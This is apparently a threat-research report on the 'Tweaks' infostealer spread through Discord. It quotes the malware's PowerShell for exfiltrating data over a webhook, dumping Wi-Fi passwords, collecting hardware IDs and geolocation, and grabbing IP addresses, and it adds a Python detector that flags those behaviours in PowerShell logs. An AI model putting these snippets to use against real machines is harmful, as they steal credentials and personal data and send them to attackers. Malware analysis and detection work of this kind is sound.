Technical Analysis

The following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.

Case Study 1

1. BAT files establish webhooks: Once the user downloads and executes the BAT file, the malware sets up the webhook URLs it will exfiltrate to using the PowerShell commands below:

"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
   "Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"

The script embeds the stolen data in the webhook payload, which is then posted to the attackers.

2. Wi-Fi profile and password theft: The malware enumerates saved Wi-Fi profiles and extracts their cleartext keys with the PowerShell command below:

"$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });"

The code sample above is also shown in Figure 5 below.

Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.

3. Using WMI to harvest system information: The malware uses Windows Management Instrumentation (WMI) to collect the hardware UUID and the username, and queries a geolocation service for the user's country, region, city, and approximate coordinates. The PowerShell code looks like this:

"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$pcUsername = $env:USERNAME;" 
"$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
"$country = $ipInfo.country;" ^
"$region = $ipInfo.region;" ^
"$city = $ipInfo.city;" ^
"$location = $ipInfo.loc;"

The code sample above, along with the harvested username and location, is shown in Figure 6 below.

Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.

4. Additional data theft: The malware also collects the public and private IP addresses, the current time, system information, the Roblox ID, and in-game currency information.

The IP addresses and current time are collected using the following PowerShell code:

"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
"$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
"$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
"$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"

The system information, Roblox ID, and currency details are collected with the code shown in Figure 7 below.

Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.
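As an added defensive example, not part of the original report, the following Python triage script scores PowerShell script-block logging text (event 4104, ScriptBlockText) for the combination of behaviours documented in Case Study 1: cleartext Wi-Fi key dumping, WMI UUID collection, external IP/geolocation lookups, and a JSON webhook post carrying an "embeds" payload. The indicator names, weights, threshold and the two sample script blocks are constructed; the matched strings come from the code shown above.

```python
import re

# Indicators taken from the Case Study 1 BAT/PowerShell code. Weights are an
# assumption for this example: a single hit (e.g. a UUID lookup in an inventory
# script) should not fire, the combination seen in Tweaks should.
INDICATORS = {
    "wifi_key_dump": (re.compile(r"netsh\s+wlan\s+show\s+profile\b.*key=clear", re.I), 4),
    "hwid_uuid":     (re.compile(r"win32_computersystemproduct.*\bUUID\b", re.I), 2),
    "geo_ip_lookup": (re.compile(r"ipinfo\.io/json|api64\.ipify\.org", re.I), 2),
    "webhook_embed": (re.compile(r"embeds\s*=\s*@\(.*Invoke-RestMethod.*-Method\s+Post", re.I | re.S), 3),
}
THRESHOLD = 5  # assumed alerting threshold


def score_script_block(text):
    """Return (score, [matched indicator names]) for one script block."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[n][1] for n in hits), hits


def is_suspicious(text):
    return score_script_block(text)[0] >= THRESHOLD


def scan_events(events):
    """Take 4104-style records ({'RecordId': int, 'ScriptBlockText': str})
    and return the RecordIds whose script text crosses the threshold."""
    return [e["RecordId"] for e in events if is_suspicious(e["ScriptBlockText"])]


# Constructed sample script blocks (not real log data).
BENIGN = """netsh wlan show profiles
$hwid = (Get-WmiObject win32_computersystemproduct).UUID
Get-Date -Format 'yyyy-MM-dd HH:mm:ss'"""

MALICIOUS = """$wifiProfiles = (netsh wlan show profiles | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' });
$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);
$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';
$payload = [PSCustomObject]@{ embeds = @($embedObject) };
Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"""

if __name__ == "__main__":
    events = [{"RecordId": 1, "ScriptBlockText": BENIGN},
              {"RecordId": 2, "ScriptBlockText": MALICIOUS}]
    for rid in scan_events(events):
        score, hits = score_script_block(events[rid - 1]["ScriptBlockText"])
        print(f"RecordId {rid}: score {score}, indicators {hits}")
```

The benign block matches only the UUID indicator and stays below the threshold, while the Tweaks-like block trips all four.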

Case Study 2

In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.

The malware creates a randomly named folder in the Temp directory, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp, and drops a BAT file into it, as shown in the screenshot below.

Figure 8: The process tree of the Tweaks EXE file.

The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.